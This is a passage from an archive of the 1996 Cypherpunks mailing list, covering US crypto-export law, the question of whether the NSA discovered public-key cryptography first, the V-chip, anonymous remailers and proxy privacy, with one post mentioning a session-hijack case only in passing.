> 	authenticate_user (int file_descriptor)
> 
> which in the exportable version sends a password, and in the domestic 
> version constructs some sort of authenticator?

Yes.  In fact, this is what Bones did.

> Could you have an xdr-like function which on in an exportable version
> just does argument marshaling and in a domestic version also encrypts?

Yes.  However the exported code cannot have the encryption hooks
in the code.

> How exactly are crypto-hooks defined?  This restriction seems orders
> of magnitude more bogus than even the ban on exporting actual
> encryption.

Very vaguely.  If I have a function that does something like this:

authenticate (args)
{
	...

	des_encrypt ();
	...
}

I would have to remove the des_encrypt() call from the authenticate()
routine before it can be exported...

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 26 Jan 1996 21:26:35 +0800
To: David Mazieres <dm@amsterdam.lcs.mit.edu>
Subject: Re: German home banking (fromn RISKS)
Message-ID: <9601250134.AA00818@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Don't high speed modems transmit and receive on the same frequencies,
>  using echo cancelation to decode the receive signals?  Does that
>  make it impossible to eavesdrop on high-speed (i.e. V32bis) modems?

No, and a lot of crackers and phone phreaks found out the hard way.  You can  
buy protocol analysers off-the-shelf that will give a dump of the entire  
communication by just passively listening in (or possibly playing back a  
recording).  I have seen units that could decode all of the popular Blue Book  
protocols for consumer equipment such as faxes and high-speed modems as well  
as ISDN, T1, DS3, ATM, etc...  Most are programmable and some are full-blown  
computers running stripped down versions of Unix and can also be controlled  
over the network from RealComputers.  With multiple analysers and a little  
custom software you could easily perform MITM attacks.  The hardest part is  
getting in the middle.

Modulation, comm-protocols, and compression techniques are not a replacement  
for honest to goodness crypto.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 25 Jan 1996 12:57:45 +0800
To: cypherpunks@toad.com
Subject: NSA advanced knowledge
Message-ID: <9601250034.AA12539@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Is there any indication that the NSA knew about public-key before
it entered the open literature?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 26 Jan 1996 18:52:14 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242348.PAA03565@ns1.vplus.com>
Message-ID: <4e6k31$i5l@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601242348.PAA03565@ns1.vplus.com>,
Dan Weinstein <djw@vplus.com> wrote:
>I forget how it is termed in ITAR, but expertise can't be exported 
>either.  Another thing to remember is that Jeff and the others at 
>Netscape aren't writing the encryption algorithms themselves, they 
>implement the code that they get from RSA.  Though most of the 
>code they get from RSA is already available abroad, if they wanted to 
>import it they would face serious copywrite problems with RSA.  Also, 
>like I suggested before any programers who gained their knowledge of 
>crypto programing in the U.S. and then went abroad and developed 
>crypto software would be in danger of prosecution under ITAR if they 
>ever returned to the U.S..

So how about my situation?  I'm a Canadian student, currently studying
in the US.  Are you saying that if, after I get my degree and return to
Canada, it would be illegal for me to write and export crypto stuff?!
What if I'm in Canada for a few weeks between semesters and I write
something then?

   - Ian "this is all really dumb..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 26 Jan 1996 21:39:01 +0800
To: iang@cs.berkeley.edu
Subject: Re: Crippled Notes export encryption
In-Reply-To: <4e6j28$g49@calum.csclub.uwaterloo.ca>
Message-ID: <199601250056.TAA10109@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Would the above code be export-restricted because it contained wishful
> thinking about how nice it would be to use encryption?

IANAL, but my guess is that no, that code would not be exportable.  At
least not if there really is a domestic vs. export version.  Yes, it
gets really fuzzy here.  I think if you started with this code and
didn't have any hooks at all, and only had a version (domestic and
export) which contained this wishful thinking, you might get away with
it.  Then again, if that were the case it would not be export
controlled in the first place since it doesn't use encryption ;)

Yes, it is a huge can of worms.  Worse, since it is done on a
case-by-case basis, there really is no clear definition of where the
exportable vs. non-exportable line actually is.  You need to try it to
test if it will work or not.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 25 Jan 1996 11:05:28 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <2.2.32.19960125010506.0099a208@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:59 PM 1/24/96 -0800, Timothy C. May wrote:

>In a kind of variant of the Fermi Paradox ("Why aren't they here?,"
>referrring to alien visitors), my question is this: "Why aren't we able to
>solve this pressing problem of not being able to export strong crypto by
>_importing_ it?"
>
>I don't think it's an accident, or laziness on the part of European and
>Asian companies, that we haven't gotten around the U.S.'s laws about
>exporting crypto by getting our crypto from competent programmers and
>companies outside the U.S.
>
>Comments?

How about time.  We're less than a year on from the "Internet Breakthrough."
It is not obvious to the non-political that stand alone desktops or
enterprise LANs need crypto.  The "need" for the product only develops with
telecoms.  Recall the fact that hardly anyone was online (or even knew what
the term meant) only a short time ago as product development cycles run.
We'll see.

Markets are efficient but not perfect.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 25 Jan 1996 11:34:10 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601242348.PAA03559@ns1.vplus.com>
Message-ID: <4e6m48$npf@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9601242357.AA02688@alpha>, Mike McNally <m5@dev.tivoli.com> wrote:
>This sounds fishy to me.  I don't recall reading anything to suggest
>that export of cryptographic software (or any other munition) requires
>that the stuff be *used* outside the US for an offense to be
>committed; why should export of a cryptographer's wetware be any
>different?  Either the expertise leaves the country or it doesn't, I'd
>think.

Here's section 120.17 of ITAR:

@ 120.17 -- Export.

   Export means:

   (1) Sending or taking a defense article out of the United States in any
manner, except by mere travel outside of the United States by a person whose
personal knowledge includes technical data; or

   (2) Transferring registration, control or ownership to a foreign person of
any aircraft, vessel, or satellite covered by the U.S. Munitions List, whether
in the United States or abroad; or

   (3) Disclosing (including oral or visual disclosure) or transferring in the
United States any defense article to an embassy, any agency or subdivision of a
foreign government (e.g., diplomatic missions); or

   (4) Disclosing (including oral or visual disclosure) or transferring
technical data to a foreign person, whether in the United States or abroad; or

   (5) Performing a defense service on behalf of, or for the benefit of, a
foreign person, whether in the United States or abroad.

   (6) A launch vehicle or payload shall not, by reason of the launching of such
vehicle, be considered an export for purposes of this subchapter. However, for
certain limited purposes (see @ 126.1 of this subchapter), the controls of this
subchapter may apply to any sale, transfer or proposal to sell or transfer
defense articles or defense services.


Item (1) allows people to travel abroad if they know crypto.  It's unclear
that it allows them to emigrate or return to their country of origin.
Items (3),(4),(5) seem to prevent such a person from using, or even mentioning,
crypto to or "on behalf of" a foreign person.

(6) is cute.  Launching a missle at Iraq isn't considered export...

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 25 Jan 1996 14:51:40 +0800
To: cypherpunks@toad.com
Subject: Re: V-chip?
In-Reply-To: <Pine.SOL.3.91.960124174011.17116A-100000@echo.sound.net>
Message-ID: <199601250433.UAA12187@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


oO F145C0 Oo <fiasco@echo.sound.net> writes:

 > Apparently the US government is planning on starting up its
 > V-chip program again, which will allow public/cable TV to be
 > censored at will. What does everyone thing about this ploy?

 > And whats next? Chips in my radio, to prevent music, or a
 > chip in my phone to make sure i dont call anyone bad? The
 > V-chip is just as much a privacy/1st amendment violation as
 > the clipper chip is/was. I believe the worst part of the
 > V-chip plan, is to force all new TV's manufactured or
 > imported to the US, to have this new chip. Could this chip
 > even be part of a Chinese lottery?

As I understand it, the basic concept behind the V-Chip is to
allow selective blocking of material a particular viewer might
find offensive based on content information transmitted along
with the program.  As long as the program material itself is
transmitted unaltered, and there are multiple non-governmental
providers of content descriptions catering to the spectrum of
human likes and dislikes, this sounds like ideal Cypherpunk
technology.

Concerned Parent can set the V-Chip to read from the Children's
Television Workshop content service, available for a small
monthly fee, and be certain that graphic violence and sex are
pixelated on screen, and that bleep words that the child might
practice in front of Grandma are garbled.

Mr. Islamic Fanatic can filter out all blasphemy against Allah
and his one and only prophet, pork commercials, and women showing
more than 100 square centimeters of exposed epidermis.  Uncle
Ernie can program his set to beep loudly when shots of nude
adolescent boys are about to appear in foreign films.  Everyone
has a filter which they can tune for their own viewing and
listening enjoyment, and a free market system of content
description services will cater to every conceivable taste.

What are the dangers of this new technology?

First, the government might want only one description of content,
which it controls.  My notion of what is offensive probably
differs greatly from that of Jesse Helms, for instance.

Second, once content descriptions become available, they might be
used to control content at the transmission end, not the viewing
end.  Congress could mandate that the same information that Uncle
Ernie uses to alert himself to "interesting" scenes, be used at
the transmitting end to pixelate the same material. V-Chips for
consumer products are our friend. V-Chips for broadcasters and
publishers are not.

It should be noted that the V-Chip is currently vaporware, and
exists only in the minds of politicians.  There probably will
never be an actual "V-Chip", just a little additional software in
our already heavily computerized televisions, radios, and
personal computers.

One desirable side effect of the V-Chip.  It will probably have
the effect of extinguishing hysterical reactions to nudity, sex,
bleep words, and special effects violence, by allowing people to
gradually increase what they are exposed to as they become
tolerant of it.  Sort of the opposite of aversion therapy.

Perhaps in the distant future, the population will wonder what
the thing was ever used for, and why anyone bothered to develop
it.

Just a few random thoughts...

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stephen_albert@alpha.c2.org (Stephen Albert)
Date: Thu, 25 Jan 1996 14:59:13 +0800
To: cypherpunks@toad.com
Subject: Netscape and NNTP
Message-ID: <199601250438.UAA26778@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've got a question that I feel like I *should* know the answer to, but don't.

Say I configure Netscape to point through an open http proxy, and then connect t
an open NNTP server.  I don't know much about how proxies work.  Does the NNTP 
connection go through the proxy or directly from my machine?  As I understand it
if it does the first, then I don't have to worry about the NNTP server's log 
file, if any.  But if it does the second, I do.

Am I in the ballpark here?

ObCrypto: Not-readily-traceable posting with less hassle than a mail-to-news 
gateway seems to have some privacy relevance, even if it's not directly crypto.

Stephen "To NNTP Serve Man" Albert
stephen_albert@alpha.c2.org <*> PGP key on request and on servers



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQbVikimCtQtWVIdAQEjZgf+KFK8AzLY8ndSBAmWzQAwqMCmbA3IR8yl
TU/c2f/FAMRypAGf+IcKIgmLAPxjbOBSvCmYv8cSXBtb/hhOFbmzIf5EY5QyfcMt
OVsMk80gHJxBiUaSYetwklkRub1dqan0R2fUfQq1ey2ZUZk3OvUB4gTW5XPKNpND
HxLINjJ2Ph6SH4AqCZ0hNwFkk3gtZsLGTgUHhdrkhaAKnEBSXWN9mMvkNHngScRq
A0SlVehxwj8yFLF5rf1G82AM3fdZrdWhMDlWmVCkgpo5mr5AXtYpfHKa9ZsesM8O
eRVvlVzXU+w4Y1B5swM5QDpezsPqxBtTn0JEb78mGM4gCoVyEi06Ow==
=gwrx
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lead remailer <lead@zifi.genetics.utah.edu>
Date: Thu, 25 Jan 1996 14:31:17 +0800
Subject: ANNOUNCE:  NEW MIXMASTER REMAILER
Message-ID: <199601250341.UAA01330@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello all,

I am pleased to announce a new mixmaster remailer.  This remailer was
compiled and installed primarily using the mix-installer script
available from Adam Shostack.  To get the script, send a message to
adam@lighthouse.homeport.org with Subject: get mix-installer.

here is the relevant info:


address:	mix@zifi.genetics.utah.edu
long name:	lead remailer
short name:	lead


for your type2.list file:

lead mix@zifi.genetics.utah.edu a76c3fda7294a6695c5e6a931d1c0b73 2.0.3


Here is the public key for lead remailer:

=-=-=-=-=-=-=-=-=-=-=-=
lead mix@zifi.genetics.utah.edu a76c3fda7294a6695c5e6a931d1c0b73 2.0.3

-----Begin Mix Key-----
a76c3fda7294a6695c5e6a931d1c0b73
258
AATH5fR56oEcdVRNn2SrjJ4XsoWb+lP2E2GgGdgI
2A3//3ctBkQ13xb5MHOfix8ra63PZmeCrK+6QbbV
Ql1iwboMMaWz8NPmNpQz2K0/vnTnp8tWEyL5vo95
jlRmACXPefXdLOzszAgfMn02rzzXrq+9AnaUAUxD
idxVglBkXRkriwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----


Here is the mix-help file:

From: mix@zifi.genetics.utah.edu (Mixmaster remailer at zifi)
Subject: Instructions for using anonymous remailer

This message is being sent to you automatically in response to the message
you sent to mix@zifi.genetics.utah.edu with subject "remailer-help".

This is a Mixmaster remailer. It provides an extremely high level of security.
To use it, you must have a client program to produce the messages.
This software is available from ftp://flame.alias.net:/pub/replay/pub/remailer
Read the README file for instructions.

Some information can be sent to you by the remailer by including the
following commands (one per message) in the subject line of mail to the
remailer.

  remailer-help		This file.

  remailer-stats	Useage statistics for the last 24 hours.

  remailer-key		The mixmaster key file for this remailer.



This section of the helpfile is blatantly plagarized from the
mixmaster faq located at:
http://www.obscura.com/~loki/remailer/mixmaster-faq.html.

---
What is Mixmaster?

Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list.
Mixmaster is the next generation in the evolution of remailer technology.


What is an anonymous remailer?

Quoting from Andre Bacard's remailer FAQ:

     An anonymous remailer (also called an "anonymous server") is a
     free computer service that privatizes your e-mail. A remailer
     allows you to send electronic mail to a Usenet news group or to a
     person without the recipient knowing your name or your e-mail
     address.


What do I need to use Mixmaster remailers?

Unlike other remailers, you can't just make your own message and send it to
the remailer. Mixmaster's security comes in part from using a special
message format. The disadvantage of this is that you need a special program
to make the message for you. Once you have that program (the client)
remailing is as easy as running the program, and telling it which remailers
you want to use.


How do I get the Mixmaster client software?

There are two sites for distribution. First, is ftp to obscura.com and
read /pub/remail/README.no-export. The other is by anonymous ftp to
jpunix.com.

You will have to follow the instructions there to get Mixmaster. Because
Mixmaster contains cryptography, it may not be exported from the U.S and
Canada. The reason for the circuitous route to download Mixmaster is to show
my good faith efforts to keep Mixmaster from being exported. I have heard
rumors that someone has already broken this law, and that Mixmaster is
available from Europe. I do not approve of this and will not support that
site.


Does Mixmaster use PGP?

No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own keys
and key file formats. To add a key to a key ring, simply append the key to
your key file using your favorite text editor.


Can mix@zifi.genetics.utah.edu post to News?

No.  News posting is not supported at this time.


Abuse Policy:
I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:
- Sending messages intended primarilly to be harassing or annoying.
- Use of the remailer for any illegal purpose.
If you don't want to receive anonymous mail, send me a message, and I will
add your email address to the block list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lead remailer <lead@zifi.genetics.utah.edu>
Date: Sat, 27 Jan 1996 16:38:44 +0800
Subject: ANNOUNCE:  NEW MIXMASTER REMAILER
Message-ID: <199601250342.UAA01350@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello all,

I am pleased to announce a new mixmaster remailer.  This remailer was
compiled and installed primarily using the mix-installer script
available from Adam Shostack.  To get the script, send a message to
adam@lighthouse.homeport.org with Subject: get mix-installer.

here is the relevant info:


address:	mix@zifi.genetics.utah.edu
long name:	lead remailer
short name:	lead


for your type2.list file:

lead mix@zifi.genetics.utah.edu a76c3fda7294a6695c5e6a931d1c0b73 2.0.3


Here is the public key for lead remailer:

=-=-=-=-=-=-=-=-=-=-=-=
lead mix@zifi.genetics.utah.edu a76c3fda7294a6695c5e6a931d1c0b73 2.0.3

-----Begin Mix Key-----
a76c3fda7294a6695c5e6a931d1c0b73
258
AATH5fR56oEcdVRNn2SrjJ4XsoWb+lP2E2GgGdgI
2A3//3ctBkQ13xb5MHOfix8ra63PZmeCrK+6QbbV
Ql1iwboMMaWz8NPmNpQz2K0/vnTnp8tWEyL5vo95
jlRmACXPefXdLOzszAgfMn02rzzXrq+9AnaUAUxD
idxVglBkXRkriwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----


Here is the mix-help file:

From: mix@zifi.genetics.utah.edu (Mixmaster remailer at zifi)
Subject: Instructions for using anonymous remailer

This message is being sent to you automatically in response to the message
you sent to mix@zifi.genetics.utah.edu with subject "remailer-help".

This is a Mixmaster remailer. It provides an extremely high level of security.
To use it, you must have a client program to produce the messages.
This software is available from ftp://flame.alias.net:/pub/replay/pub/remailer
Read the README file for instructions.

Some information can be sent to you by the remailer by including the
following commands (one per message) in the subject line of mail to the
remailer.

  remailer-help		This file.

  remailer-stats	Useage statistics for the last 24 hours.

  remailer-key		The mixmaster key file for this remailer.



This section of the helpfile is blatantly plagarized from the
mixmaster faq located at:
http://www.obscura.com/~loki/remailer/mixmaster-faq.html.

---
What is Mixmaster?

Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list.
Mixmaster is the next generation in the evolution of remailer technology.


What is an anonymous remailer?

Quoting from Andre Bacard's remailer FAQ:

     An anonymous remailer (also called an "anonymous server") is a
     free computer service that privatizes your e-mail. A remailer
     allows you to send electronic mail to a Usenet news group or to a
     person without the recipient knowing your name or your e-mail
     address.


What do I need to use Mixmaster remailers?

Unlike other remailers, you can't just make your own message and send it to
the remailer. Mixmaster's security comes in part from using a special
message format. The disadvantage of this is that you need a special program
to make the message for you. Once you have that program (the client)
remailing is as easy as running the program, and telling it which remailers
you want to use.


How do I get the Mixmaster client software?

There are two sites for distribution. First, is ftp to obscura.com and
read /pub/remail/README.no-export. The other is by anonymous ftp to
jpunix.com.

You will have to follow the instructions there to get Mixmaster. Because
Mixmaster contains cryptography, it may not be exported from the U.S and
Canada. The reason for the circuitous route to download Mixmaster is to show
my good faith efforts to keep Mixmaster from being exported. I have heard
rumors that someone has already broken this law, and that Mixmaster is
available from Europe. I do not approve of this and will not support that
site.


Does Mixmaster use PGP?

No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own keys
and key file formats. To add a key to a key ring, simply append the key to
your key file using your favorite text editor.


Can mix@zifi.genetics.utah.edu post to News?

No.  News posting is not supported at this time.


Abuse Policy:
I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:
- Sending messages intended primarilly to be harassing or annoying.
- Use of the remailer for any illegal purpose.
If you don't want to receive anonymous mail, send me a message, and I will
add your email address to the block list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 26 Jan 1996 21:25:35 +0800
To: cypherpunks@toad.com
Subject: NSA advanced knowledge
Message-ID: <199601250144.UAA26828@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by rsalz@osf.org (Rich Salz) on Wed, 24 Jan  
7:34 PM

>Is there any indication that the NSA knew about 
>public-key before  it entered the open literature?


   Fred B. Wrixon writes in "Codes and Ciphers," under the
   "Public Key" entry:

      ... This Hellman-Diffie proposal was apparently
      anticipated by a similar version developed by the
      National Security Agency (NSA) a decade earlier.
      (p. 164)

   No citation or elaboration is given for this claim.

   Wrixon's book is a simply written compendium:

      Codes and Ciphers: An A to Z of Covert Communication,
      from the Clay Tablet to the Microdot.
      Fred B. Wrixon
      Prentice Hall, 1992. Paper $18.00
      ISBN 0-13-277047-4







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 25 Jan 1996 12:43:27 +0800
To: iang@cs.berkeley.edu
Subject: (JOKE) Re: Crippled Notes export encryption
In-Reply-To: <4e6j28$g49@calum.csclub.uwaterloo.ca>
Message-ID: <199601250158.UAA10951@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


So does that mean that it is legal to ship PGP out of the US by
shooting a diskette in a rocket???  It's launching the munition, no?
Therefore by sentence (6) it should be allowed. ;)

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jan 1996 14:31:30 +0800
To: cypherpunks@toad.com
Subject: Re: NSA advanced knowledge
Message-ID: <ad2c3ac2070210049c87@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 AM 1/25/96, Rich Salz wrote:
>Is there any indication that the NSA knew about public-key before
>it entered the open literature?

I've asked Whit Diffie about this issue more than once. He, too, is very
interested in the real answer to this.

In the Gus Simmons book, there are cryptic (sorry) references to what the
NSA may have known. And certainly Don Coppersmith was no slouch, having
been a Putnam winner in the early 70s (I was invited to take the Putnam
about that time, and was so overwhelmed and unprepared--especially being
that I was studying physics then--that I just gave up and left the room!).

On the other hand, the comments are sufficiently elliptical that it may
just be the NSA putting the best face on an embarrassing development.

At Crypto '88, I put this question to NSA cryptographer Brian Snow. He just
played the Cheshire cat. Which told me nothing.

A friend of mine who was an active amateur cryptographer in the 1970s
pointed out to me--much later--that there were NSA boxes used on ships and
similar remote outposts which appeared to have no provision for providing
keying material, suggesting a sealed-box public-key system. He was just
speculating, of course.

Here's to hoping the Bamford-Madsen 2nd edition sheds more light on this
subject. I can't say I'll be surprised to learn that NSA was as surprised
as the rest of us.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 25 Jan 1996 14:09:12 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: NSA advanced knowledge
In-Reply-To: <9601250034.AA12539@sulphur.osf.org>
Message-ID: <3106f4fd4bdc002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 25 Jan 1996 15:40:18 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape & open NNTP servers
In-Reply-To: <199601250101.RAA01312@infinity.c2.org>
Message-ID: <310713C3.4CE5@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Albert wrote:
> I've got a question that I feel like I *should* know the answer to, but don't.
> 
> Say I configure Netscape to point through an open http proxy, and then connect t
> an open NNTP server.  I don't know much about how proxies work.  Does the NNTP
> connection go through the proxy or directly from my machine?  As I understand it
> if it does the first, then I don't have to worry about the NNTP server's log
> file, if any.  But if it does the second, I do.

  I believe that it will use a SOCKS proxy if configured, but that
NNTP will not use the HTTP proxy.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 27 Jan 1996 16:33:45 +0800
To: cypherpunks@toad.com
Subject: Encrypted IP tunneling
Message-ID: <960124.212346.1s8.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I suddenly find myself in a position where I really need to set up a
secure IP pipe between my machine and another site.  All the machines
involved are running Linux, of slightly varying vintages (but all
recent kernels).

Recomendations appreciated.  Save listwidth... email direct.  Thanks.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQb5lWCl9Uka85MxAQEJqQf/Zqvq5wg8xGsiXliiyq9uWQzTI9ClVrk+
kKIJIYjpdkE8BJqbW+e5f56h6IDBUu+2wX+kl/AyBF714MIAXsHcG3CoMvwJ85Z+
7Pni1rcnGesVyub32lUUuTFkGy1MWwFexMtMJLjeTV4nunrhVj6JX80cUQI2mnBG
U+LscMhTfnln7Y55qPPMuVDrGOtu2cdA1foJ6AxGWmaTbz5Sa6tw0o1dVjlS4uQR
iz61HVv44mzhN4EFEfdNNQHskWSmrx7lQwYAdmyTT8ii4qvMU0oT3TQ8ENq/XTfn
lnqqRjd72XzTkgrFfi8DAHVOntOWwuS/S1McrbMs07jgv2QOF6uzVA==
=eO7h
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 27 Jan 1996 07:53:34 +0800
To: cypherpunks@toad.com
Subject: UK newspaper names Zimmermann a "neo-Nazi sympathiser"
In-Reply-To: <199601250213.SAA25209@well.com>
Message-ID: <kl1ibG200YUv8z81Mk@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain






From: Mike Godwin <mnemonic@well.com>
Subject: Re: UK newspaper names Zimmermann a "neo-Nazi sympathiser"
To: Declan McCullagh
Date: Wed, 24 Jan 1996 18:13:11 -0800 (PST)
Cc: fight-censorship+@andrew.cmu.edu

 
Zimmermann stands to recover a lot if he sues the Telegraph under British
libel laws.


--Mike

[...]

> 
>  Subject: "PRZ a nazi" to be retracted
>  To: cypherpunks@toad.com (Cypherpunks)
>  Date: Tue, 23 Jan 1996 21:58:48 -0700 (MST)
>  Cc: prz@acm.org (Philip Zimmermann)
>  From: Philip Zimmermann <prz@acm.org>
>  Reply-To: Philip Zimmermann <prz@acm.org>
>  X-Mailer: ELM [version 2.4 PL22]
>  Content-Type: text
>  Sender: owner-cypherpunks@toad.com
>  Precedence: bulk
>  
>  The Sunday Telegraph of London printed a story last Sunday about neo-nazis
>  using PGP to encrypt their communications.  The story said that PGP was
>  devised by an American neo-nazi sympathizer.  As the creator of PGP, and
>  a human rights activist, I was outraged by such a defamation from a major
>  newspaper.  I called my lawyer Phil Dubois, who seemed to look forward to
>  having some fun with this newspaper.
>  
>  Not wanting to wait around till the morning, and slow lawyers, I called
>  Robin Gedye, the reporter in Bonn who wrote the story, at 7am Monday morning
>  Bonn time, and woke him up at home.  I introduced myself and told him how I
>  felt about it.  He had never heard of me, the Clipper chip, the
controversies
>  of cryptography, and knew nothing about PGP outside of the couple of
>  sentences in his story that mentioned PGP.  He said it wasn't really so bad,
>  because he didn't specifically identify me by name.  One can imagine the
>  effectiveness of that excuse with me.  I then went into some detail with him
>  to bring him up to speed.  I also called his editor in London, who also had
>  never heard of me or PGP.
>  
>  After some checking, they discovered that the Daily Telegraph, a related
>  newspaper, had run an article about my case just a week before.  They also
>  found about 20 recent articles on me in the UK press.  The editor said that
>  my story "checks out".  It was good to know that they now believed that I
>  was not a neo-nazi after all.
>  
>  Anyway, Mr. Gedye says that the Sunday Telegraph will print a retraction
>  next Sunday.  Not just a little retraction, but a whole article on the
>  subject, written by Mr. Gedye himself.  I'm glad to see that this probably
>  means that he will dig into the subject more, in order to write such an
>  article.
>  
>  I guess this means maybe I'll find some other things to occupy Phil Dubois's
>  time.
>  
>    -Philip Zimmermann
>     23 Jan 96
> 
> 
> // declan@eff.org // My opinions are not in any way those of the EFF //
> 
> 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Sat, 27 Jan 1996 07:50:20 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: German home banking (fromn RISKS)
In-Reply-To: <199601250030.TAA15203@amsterdam.lcs.mit.edu>
Message-ID: <Pine.SOL.3.91.960124212817.5633P-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


> Was the person in the basement eavesdroping or actuall performing a
> man-in-the-middle attack?

He was first eavesdropping then he performed a hijack attack once 
authentication was achieved.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed        Finger samman@suned.cs.yale.edu for key
Want to hire a soon-to-be college grad? 		Mail me for resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 25 Jan 1996 14:02:02 +0800
To: Ulf_Moeller@public.uni-hamburg.de
